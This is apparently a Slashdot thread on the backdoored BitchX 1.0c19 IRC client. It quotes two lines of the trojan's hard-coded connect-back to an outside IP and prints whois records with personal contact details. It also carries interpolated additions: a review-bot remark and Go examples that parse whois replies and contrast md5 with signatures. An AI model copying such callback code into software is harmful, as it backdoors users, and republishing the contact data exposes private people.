Security

BitchX 1.0c19 IRC Client Backdoored

JRAC writes "A recent Bugtraq submission has indicated that the popular IRC client, BitchX, contains a backdoor. So far, only certain 1.0c19 files, downloaded from ftp.bitchx.com are reported to contain the malicious code. The BitchX developers have been notified, so hopefully a fix will be issued soon. Looks like irssi wasn't the only one ;)"
  • Who's this? (Score:5, Informative)

    by Draoi ( 99421 ) <draiocht&mac,com> on Tuesday July 02, 2002 @09:48AM (#3806966)
    There's an interesting IP address hard-coded into the trojaned code:

    + sa.sin_port = htons (6667);
    + sa.sin_addr.s_addr = inet_addr ("213.77.115.17"); alarm (10);
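    Review bot: these two `+` lines write a fixed destination into the sockaddr (port 6667 via htons, address 213.77.115.17 via inet_addr) and arm a 10-second alarm around whatever connect follows, with no reference to the server the user configured; an IRC client takes its server address from configuration, so a literal IP baked into sa.sin_addr.s_addr is a callback to a third party and should be rejected in review on its own, before anything else in the hunk is considered.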
    Doing a reverse-DNS lookup gives:
    ;; QUERY SECTION:
    ;; 17.115.77.213.in-addr.arpa, type = ANY, class = IN

    ;; ANSWER SECTION:
    17.115.77.213.in-addr.arpa. 1H IN PTR wenus.dtcomsa.com.
    .... so who are they??
  • Re:The name.... (Score:3, Informative)

    by RealisticWeb.com ( 557454 ) on Tuesday July 02, 2002 @09:51AM (#3806993) Homepage
    You're not alone by far. My computer (yes, even my Linux box) is a family computer, and I refuse to use any software with names or content that is not appropriate for my children to see. Keep in mind that what is "appropriate" is totally my opinion, and some people would argue with me, but my question is: why is this only ever an issue with open source software?
  • Re:Who's this? (Score:4, Informative)

    by zdzichu ( 100333 ) on Tuesday July 02, 2002 @09:52AM (#3807001) Homepage Journal
    inetnum 213.77.115.0 - 213.77.115.255
    netname DATACOM
    descr Datacom
    descr Warszawa Bemowo
    country PL
    admin-c AW7760-RIPE
    tech-c RW7118-RIPE
    status ASSIGNED PA
    mnt-by AS5617-MNT
    changed tkielb@cst.tpsa.pl 20000915
    source RIPE

    (stupidly formatted because of lamefilter)
  • Re:Who's this? (Score:1, Informative)

    by Anonymous Coward on Tuesday July 02, 2002 @09:54AM (#3807008)
    It's hardly likely to be the owners of that machine that wrote the backdoor. That IP is likely to be somebody else's machine that's been compromised and used by the backdoor creators.
  • by Cyclops ( 1852 ) <rms AT 1407 DOT org> on Tuesday July 02, 2002 @09:54AM (#3807009) Homepage
    Many don't digitally sign their sources with a secure key, and thus there is absolutely no way to verify that those sources are the ones the developer intended to release.

    Many think that a simple md5sum alongside the sources is enough. IT IS NOT. Any attacker who replaces the sources can as easily replace the md5sum, which can be generated by anyone.

    A digital signature (I suggest using gpg) can only be generated by YOU if you keep the key in a secure place and use it to sign the sources. The public side of this key should be widely distributed and preferably signed (that is, recognized) by third parties... the more trustworthy these third parties are, the better.

    After the huge attack on the network where such sites as Apache were hosted, other Apache projects which did not sign their packages suddenly started signing them. They got scared. You should be too.

    A lot of people instinctively trust their dns resolutions (oops) and also think that if they go to http://www.mozilla.org they will get their favorite browser for sure. They are also wrong. dns can be spoofed under certain conditions, so they could be going to crackersR.us instead, and downloading a neat trojaned source, for instance.

    The more a project grows in fame, the more it will become a likely target for these kinds of attacks, so the more need for a degree of responsibility that should not be needed, but unfortunately is, since the danger is ubiquitous.

    Be careful, be very careful.

    Also, avoid using the root user, period.
  • Re:Who's this? (Score:5, Informative)

    by Neil Watson ( 60859 ) on Tuesday July 02, 2002 @09:58AM (#3807038) Homepage
    PL is Poland.

    [nwatson@valetta ~]$whois 213.77.115.17
    % This is the RIPE Whois server.
    % The objects are in RPSL format.
    % Please visit http://www.ripe.net/rpsl for more information.
    % Rights restricted by copyright.
    % See http://www.ripe.net/ripencc/pub-services/db/copyright.html

    inetnum: 213.77.115.0 - 213.77.115.255
    netname: DATACOM
    descr: Datacom
    descr: Warszawa Bemowo
    country: PL
    admin-c: AW7760-RIPE
    tech-c: RW7118-RIPE
    status: ASSIGNED PA
    mnt-by: AS5617-MNT
    changed: tkielb@cst.tpsa.pl 20000915
    source: RIPE

    route: 213.77.0.0/16
    descr: TPNET (PL)
    descr: Provider Local Registry
    origin: AS5617
    notify: konradpl@zt.piotrkow.tpsa.pl
    mnt-by: AS5617-MNT
    changed: konradpl@zt.piotrkow.tpsa.pl 20000728
    source: RIPE

    person: Arkadiusz Wrobel
    address: "DataCOM" S. A.
    address: ul Radiowa 21a m20
    address: 01 - 485 Warszawa
    address: POLAND
    phone: +48 606 298639
    fax-no: +48 22 6672495
    e-mail: awrobel@wat.waw.pl
    nic-hdl: AW7760-RIPE
    mnt-by: AS5617-MNT
    changed: tkielb@cst.tpsa.pl 20000915
    source: RIPE

    person: Rafal Wrzosek
    address: "DataCOM" S. A.
    address: ul Kaliskiego 11a /312
    address: 01 - 485 Warszawa
    address: POLAND
    phone: +48 606 145187
    fax-no: +48 22 6672495
    e-mail: awrobel@wat.waw.pl
    nic-hdl: RW7118-RIPE
    mnt-by: AS5617-MNT
    changed: tkielb@cst.tpsa.pl 20000915
    source: RIPE

    Yes, someone has most likely compromised the box and is using it for the backdoor. However, the owners of the box are still responsible for the lack of security that allowed their box to be compromised.
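    The whois reply above is in RIPE's RPSL layout: objects made of "key: value" lines, separated by blank lines, with server comments prefixed by "%" and keys such as descr repeated. When a hard-coded callback address turns up in a trojaned build, the first thing a responder does with it is exactly this lookup, and the next is to pull the netblock, origin AS and contact addresses out of the reply for an abuse report. The following is an added example (not from this thread and not RIPE's own tooling) that parses that format offline; the sample is the reply quoted above, trimmed to the attributes used, and the object types it looks for (inetnum, route, person with nic-hdl) are the ones present in that reply.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// SampleReply is the RIPE reply quoted in the thread, trimmed to the
// attributes this example uses (mnt-by/changed lines dropped).
const SampleReply = `% This is the RIPE Whois server.
% The objects are in RPSL format.

inetnum:      213.77.115.0 - 213.77.115.255
netname:      DATACOM
descr:        Datacom
descr:        Warszawa Bemowo
country:      PL
admin-c:      AW7760-RIPE
tech-c:       RW7118-RIPE
status:       ASSIGNED PA
source:       RIPE

route:        213.77.0.0/16
descr:        TPNET (PL)
origin:       AS5617
source:       RIPE

person:       Arkadiusz Wrobel
address:      "DataCOM" S. A.
e-mail:       awrobel@wat.waw.pl
nic-hdl:      AW7760-RIPE
source:       RIPE

person:       Rafal Wrzosek
address:      "DataCOM" S. A.
e-mail:       awrobel@wat.waw.pl
nic-hdl:      RW7118-RIPE
source:       RIPE
`

// Object is one RPSL object: keys may repeat (descr, address), so each key
// maps to its values in the order they appeared.
type Object map[string][]string

// ParseRPSL splits a whois reply into objects. "%" lines are server
// comments and are skipped; a blank line ends the current object.
func ParseRPSL(reply string) []Object {
	var objs []Object
	cur := Object{}
	flush := func() {
		if len(cur) > 0 {
			objs = append(objs, cur)
			cur = Object{}
		}
	}
	sc := bufio.NewScanner(strings.NewReader(reply))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		switch {
		case line == "":
			flush()
		case strings.HasPrefix(line, "%"):
			continue
		default:
			// Split on the first colon only: values such as URLs contain colons.
			key, val, ok := strings.Cut(line, ":")
			if !ok {
				continue // not an attribute line; ignore it
			}
			key = strings.TrimSpace(key)
			cur[key] = append(cur[key], strings.TrimSpace(val))
		}
	}
	flush()
	return objs
}

// Triage is what goes into an abuse report for a callback address.
type Triage struct {
	Inetnum, Netname, Country, OriginAS string
	Contacts                            []string // e-mails of admin-c/tech-c handles
}

func first(v []string) string {
	if len(v) > 0 {
		return v[0]
	}
	return ""
}

// TriageReply resolves the admin-c/tech-c handles of the inetnum object to
// the e-mail attributes of the matching person objects, deduplicated.
func TriageReply(reply string) Triage {
	var t Triage
	var handles []string
	byHandle := map[string]Object{}
	for _, o := range ParseRPSL(reply) {
		switch {
		case len(o["inetnum"]) > 0:
			t.Inetnum, t.Netname, t.Country = o["inetnum"][0], first(o["netname"]), first(o["country"])
			handles = append(handles, o["admin-c"]...)
			handles = append(handles, o["tech-c"]...)
		case len(o["route"]) > 0:
			t.OriginAS = first(o["origin"])
		case len(o["nic-hdl"]) > 0:
			byHandle[o["nic-hdl"][0]] = o
		}
	}
	seen := map[string]bool{}
	for _, h := range handles {
		for _, mail := range byHandle[h]["e-mail"] {
			if !seen[mail] {
				seen[mail] = true
				t.Contacts = append(t.Contacts, mail)
			}
		}
	}
	return t
}

func main() {
	fmt.Printf("%+v\n", TriageReply(SampleReply))
}
```

    Both person objects in the reply carry the same e-mail, so the contact list collapses to one address; a reply where the handles resolve to nothing (a stale admin-c) simply yields an empty Contacts, which is the cue to fall back to the RIR's abuse mailbox for the AS.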

  • by bogado ( 25959 ) <bogado.bogado@net> on Tuesday July 02, 2002 @10:18AM (#3807139) Homepage Journal
    RPM does this, and most rpm managers do exactly this (red-carpet for instance). I bet debian has the same type of protection. If you only install software from trusted distributors, you should be fine.
  • Re:XSS in Slashcode (Score:4, Informative)

    by jamie ( 78724 ) <jamie@slashdot.org> on Tuesday July 02, 2002 @10:21AM (#3807153) Journal
    This post is quite inaccurate and we will be responding, also on bugtraq, momentarily. The author of the post did not contact the Slash development team, or we could have corrected some of his misconceptions.
  • Re:It's Odd (Score:3, Informative)

    by frozenray ( 308282 ) on Tuesday July 02, 2002 @10:42AM (#3807276)
    A user named uid0 made an excellent point in a usenet thread about the backdoored dsniff/fragroute/fragrouter utilities on monkey.org:

    This makes one wonder a question that would be best posed to the community; the purpose of MD5/SHA/etc is to provide unequivocal evidence as to the validity of a piece of data. More often than not, such files are kept in the same, vulnerable, location as the actual data. Clearly one can see the downfall of such a system.

    (source [google.com])
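    Cyclops's comment above (an md5sum served next to the tarball proves nothing, because whoever swaps the tarball regenerates the checksum; only a signature under a key the mirror never had does) and the uid0 quote just above (the hash file lives in the same vulnerable location as the data) make the same point. The following is an added example, not code from this thread or from BitchX, that runs both attacks against a constructed release: it uses Ed25519 from Go's standard library in place of gpg so it runs offline, but the trust model is the one Cyclops describes, and it goes one step past the comment by also trying the attacker's other option, re-signing the trojaned tarball under a key the attacker controls.

```go
package main

import (
	"crypto/ed25519"
	"crypto/md5"
	"crypto/rand"
	"encoding/hex"
	"fmt"
)

// Release is what a download mirror serves: the tarball, the md5sum that
// sits next to it, and a detached signature the maintainer produced with a
// private key that never goes anywhere near the mirror.
type Release struct {
	Tarball []byte
	MD5Sum  string // hex digest, as found in a MD5SUMS file
	Sig     []byte // detached Ed25519 signature over Tarball
}

// NewKeyPair generates a maintainer (or attacker) key pair.
func NewKeyPair() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err) // only fails if the OS RNG is unavailable
	}
	return pub, priv
}

func md5Hex(b []byte) string {
	sum := md5.Sum(b)
	return hex.EncodeToString(sum[:])
}

// Publish is the maintainer's step: ship the tarball, its md5sum, and a
// signature over the tarball bytes.
func Publish(priv ed25519.PrivateKey, tarball []byte) Release {
	return Release{Tarball: tarball, MD5Sum: md5Hex(tarball), Sig: ed25519.Sign(priv, tarball)}
}

// Trojan is the attacker's step after compromising the mirror: swap the
// tarball and regenerate the md5sum. Anyone can do that, because the
// checksum file lives in the same place as the file it is meant to protect.
func Trojan(r Release, backdoored []byte) Release {
	r.Tarball = backdoored
	r.MD5Sum = md5Hex(backdoored)
	return r
}

// Resign is the attacker's second attempt: replace the signature with one
// made under a key the attacker controls.
func Resign(r Release, attackerPriv ed25519.PrivateKey) Release {
	r.Sig = ed25519.Sign(attackerPriv, r.Tarball)
	return r
}

// CheckMD5 is what "I verified the md5sum" actually checks: that the file
// matches the checksum served next to it.
func CheckMD5(r Release) bool {
	return md5Hex(r.Tarball) == r.MD5Sum
}

// CheckSig depends on something the mirror does not have: the maintainer's
// public key, obtained out of band (a keyserver, a key signed by people you
// trust, a key pinned from a previous install).
func CheckSig(maintainerPub ed25519.PublicKey, r Release) bool {
	return ed25519.Verify(maintainerPub, r.Tarball, r.Sig)
}

func main() {
	pub, priv := NewKeyPair()
	// Constructed stand-ins for the real tarball bytes.
	genuine := Publish(priv, []byte("BitchX-1.0c19.tar.gz (constructed stand-in)"))
	bad := Trojan(genuine, []byte("BitchX-1.0c19.tar.gz with connect-back (constructed)"))
	_, attackerPriv := NewKeyPair()
	resigned := Resign(bad, attackerPriv)

	cases := []struct {
		name string
		r    Release
	}{{"genuine", genuine}, {"trojaned, md5sum regenerated", bad}, {"trojaned, re-signed by attacker", resigned}}
	for _, c := range cases {
		fmt.Printf("%-32s md5 ok=%-5v sig ok=%v\n", c.name, CheckMD5(c.r), CheckSig(pub, c.r))
	}
}
```

    The md5 check passes for all three releases and only the genuine one passes the signature check. The caveat Cyclops hints at is the out-of-band part: if the verifier fetches the public key from the same compromised mirror, the attacker's re-signed release verifies fine, which is why the key has to be pinned or vouched for by third parties rather than downloaded alongside the package.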
  • Re:The name.... (Score:3, Informative)

    by bmetzler ( 12546 ) <bmetzlerNO@SPAMlive.com> on Tuesday July 02, 2002 @12:39PM (#3808075) Homepage Journal

    It's not really that much of an issue. It would be trivial to go into the BitchX source code, edit the PROGNAME definition, or whatever the equivalent is, and make yourself a nice new IRC client named whatever you want.

    Yes it is. Unless they've made major changes to the code recently. I tried patching the code base about a year ago to make a censored version, but the program name is hardcoded in a million places. And once you do find and replace everything, you still have the problem of creating a new patch every time a new version is released.

    -Brent

  • by Nailer ( 69468 ) on Tuesday July 02, 2002 @07:10PM (#3811256)
    RPM, the standard packaging system according to the Linux Standards Base, had support for PGP (IIRC) around three years ago. This was replaced / upgraded to GPG a couple of years ago. Every package in Red Hat Linux (and most other popular distros) is signed (unless someone screws up - there was a case where 2 packages weren't properly signed, but signed replacements were made available soon after). RPM will print a strong warning if the signature isn't correct (and maybe fail the operation - dunno, my signatures have always been correct).

    Dpkg also recently added GPG support, but you have to trust individuals rather than a specific company - no packager is going to lose their job if they're working in Albania on Debian trojaning packages.
